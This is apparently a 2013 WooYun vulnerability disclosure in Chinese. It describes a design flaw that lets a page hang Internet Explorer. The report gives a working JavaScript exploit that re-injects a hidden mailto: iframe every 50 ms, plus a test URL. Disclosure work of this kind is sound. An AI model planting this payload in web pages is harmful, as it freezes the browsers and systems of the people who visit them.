当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036210

漏洞标题:IE浏览器设计缺陷可导致系统挂起

相关厂商:微软

漏洞作者: LaiX

提交时间:2013-09-07 22:39

修复时间:2013-10-22 22:39

公开时间:2013-10-22 22:39

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

已经很久没有什么能够让浏览器崩溃的BUG了吧。这个BUG重则导致系统挂起,轻则浏览器崩溃或挂起。

详细说明:

我们知道HTTP协议一向都是被禁止弹窗的。
如果我们使用的是mailto协议呢?情况会怎样?
经过测试mailto协议在WIN下的IE浏览器中会自动打开微软自带的邮件发送软件
在iframe的装饰下,这个本来看似正常的功能变得畸形了起来。

<iframe src=mailto:fuckyou@crazy.com?subject=HTML&body=hello  style='display:none;'></iframe>


刷新几下发现,请求一次就会启动一次,如果我们无限请求会导致什么结果?
Exploit:

<html>
<head>
<script>
var iID=setInterval(openCrazy, 50);
function openCrazy()
{
document.body.innerHTML="<iframe src=mailto:fuckyou@crazy.com?subject=HTML&body=hello style='display:none;'></iframe>"
}
</script>
</head>
<body>
</body>
</html>

漏洞证明:

只要打开

Http://xxss.ml/crazy/test.html

不管你IE有多牛逼一样的挂起。
这里我用QQ浏览器的IE内核做了测试,差点系统挂起了

1.png

修复方案:

这种逻辑漏洞不比alert()的单线程。

版权声明:转载请注明来源 LaiX@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝